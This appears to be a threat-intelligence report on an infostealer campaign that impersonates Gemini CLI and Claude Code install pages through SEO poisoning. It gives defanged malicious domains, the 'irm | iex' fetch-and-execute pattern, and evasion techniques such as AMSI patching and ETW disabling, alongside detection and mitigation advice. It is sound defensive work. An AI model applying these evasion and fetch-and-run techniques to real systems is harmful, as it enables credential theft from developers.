Full Report
Executive summary Financially motivated eCrime actors will likely continue to expand opportunistic campaigns by impersonating AI platforms. These campaigns generate direct supply chain risk for enterprises, as threat actors target software developer tooling, including AI coding assistants and package managers, to compromise developer workstations. In early March 2026, EclecticIQ analysts identified an ongoing infostealer campaign targeting Gemini CLI and Claude Code users. Threat actors use SEO poisoning to surface fake domains above legitimate results, directing victims to attacker-controlled infrastructure that mimics genuine AI agent installation pages. The infostealer targets Windows endpoints and executes entirely in memory through PowerShell, harvesting credentials and sensitive data from a wide range of applications before exfiltrating the results in encrypted form to a command-and-control server. Beyond credential theft, the malware provides arbitrary remote code execution capability, which financially motivated operators leverage to transition into hands-on-keyboard intrusions against selected victims and execute interactive code within the compromised environment. Installations from these impersonated websites result in exfiltration of OAuth tokens, CI/CD credentials, corporate VPN details, and sensitive files, giving adversaries a direct path to initial access into the wider enterprise network. This campaign showing that, financially motivated threat actors are capitalizing on widespread enterprise adoption of AI platforms to deliver infostealer malware. Despite sustained law enforcement action, including Operation Magnus against RedLine and META in October 2024 and the May 2025 disruption of LummaC2 infrastructure, infostealer deployment against enterprise targets will likely continue to grow in the near term. Low operating costs and persistent demand for stolen credentials in underground markets sustain this trajectory. Typosquatted domains impersonate Gemini and Claude Code installation The Gemini CLI impersonation campaign was first publicly identified by independent threat researcher @g0njxa [1], whose initial discovery enabled analysis and infrastructure pivoting documented in this report. The infection chain begins with a Google search by a developer looking for the official Gemini CLI [2] or Claude Code [3] installation page. Threat actors use SEO poisoning to surface a fake domain at the top of search results, above the legitimate source. The victim clicks through, lands on a malicious page visually consistent with a genuine vendor installation guide and is prompted to execute a single command to complete the install.
Analysis Summary
# Tool/Technique: AI-Platform Impersonation Infostealer Campaign
## Overview
This is a sophisticated, financially motivated eCrime campaign targeting software developers and enterprise environments. The attack leverages SEO poisoning to impersonate popular AI coding assistants (Gemini CLI and Claude Code). The primary purpose is to deploy a memory-resident PowerShell infostealer that harvests high-value credentials, specifically targeting developer and infrastructure-related data.
## Technical Details
- **Type:** Malware (Infostealer) / Technique (SEO Poisoning/Typosquatting)
- **Platform:** Windows
- **Capabilities:** Credential harvesting, arbitrary remote code execution (RCE), anti-forensics, and data exfiltration.
- **First Seen:** March 2026
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1583.001 - Acquire Infrastructure: Domains]
- **[TA0002 - Execution]**
- [T1059.001 - Command and Scripting Interpreter: PowerShell]
- [T1204.002 - User Execution: Malicious File]
- **[TA0005 - Defense Evasion]**
- [T1027 - Obfuscated Files or Information]
- [T1562.001 - Impair Defenses: Disable or Modify Tools]
- [T1497.001 - Virtualization/Sandbox Evasion: System Checks]
- **[TA0006 - Credential Access]**
- [T1555.003 - Credentials from Web Browsers]
- [T1539 - Steal Web Session Cookie]
- [T1552.001 - Unsecured Credentials: Credentials In Files]
- **[TA0011 - Command and Control]**
- [T1071.001 - Application Layer Protocol: Web Protocols]
## Functionality
### Core Capabilities
- **In-Memory Execution:** Operates entirely within PowerShell memory to minimize disk footprint.
- **Selective Data Harvesting:** Targets browser login data, session cookies (Slack, Teams, Discord), and cloud sync directories (Proton Drive, iCloud, OneDrive).
- **Developer-Specific Targeting:** Actively seeks out OAuth tokens, CI/CD credentials, OpenVPN configurations, and sensitive SSH keys (via PuTTY/WinSCP).
### Advanced Features
- **Anti-Analysis:** Includes approximately 6,800 lines of junk code to hinder analysis and specifically checks for `qemu-ga` to detect sandbox environments.
- **Subverting Security Controls:** Patches `amsi.dll` in memory to bypass the Antimalware Scan Interface and disables Event Tracing for Windows (ETW) to prevent logging.
- **Pivot Potential:** Provides RCE capabilities, allowing threat actors to transition from automated theft to "hands-on-keyboard" attacks.
## Indicators of Compromise
- **File Names:** `Install.ps1`
- **Network Indicators:**
- `geminicli[.]co[.]com` (Fake installation page)
- `gemini-setup[.]com` (Payload delivery)
- `claudecode[.]co[.]com` (Fake installation page)
- `claude-setup[.]com` (Payload delivery)
- `events[.]msft23[.]com` (C2 Server)
- `events[.]ms709[.]com` (C2 Server)
- **Behavioral Indicators:**
- PowerShell execution using the `irm | iex` (Invoke-RestMethod | Invoke-Expression) pattern.
- Hidden PowerShell windows launched via `Shell.Application.ShellExecute`.
- Unusual process enumeration via Restart Manager API instead of standard `Get-Process`.
## Associated Threat Actors
- Unnamed financially motivated eCrime actors (Analysis suggests TTPs similar to those targeting developer supply chains).
## Detection Methods
- **Behavioral Detection:** Monitor for PowerShell processes disabling ETW (patching `m_enabled` flag) or patching `amsi.dll`.
- **Network Monitoring:** Look for outbound connections to newly registered domains mimicking popular developer tools and AI platforms.
- **Process Monitoring:** Alert on the use of `Restart Manager API` by non-system processes for unexpected process enumeration.
## Mitigation Strategies
- **User Education:** Train developers to verify official URLs for CLI tools (e.g., Google or Anthropic official documentation) and avoid running "one-liner" install scripts from unverified sources.
- **Endpoint Hardening:** Enforce PowerShell Constrained Language Mode and utilize script block logging to visibility into in-memory execution.
- **Domain Filtering:** Use DNS filtering to block newly registered domains and known typosquatted infrastructure.
- **Credential Protection:** Implement hardware security keys (FIDO2) to mitigate the impact of stolen session cookies and credentials.
## Related Tools/Techniques
- **RedLine/LummaC2:** While infrastructure was disrupted, this campaign continues the trend of enterprise-focused infostealers.
- **SEO Poisoning:** Common technique used to bypass traditional email-based phishing filters.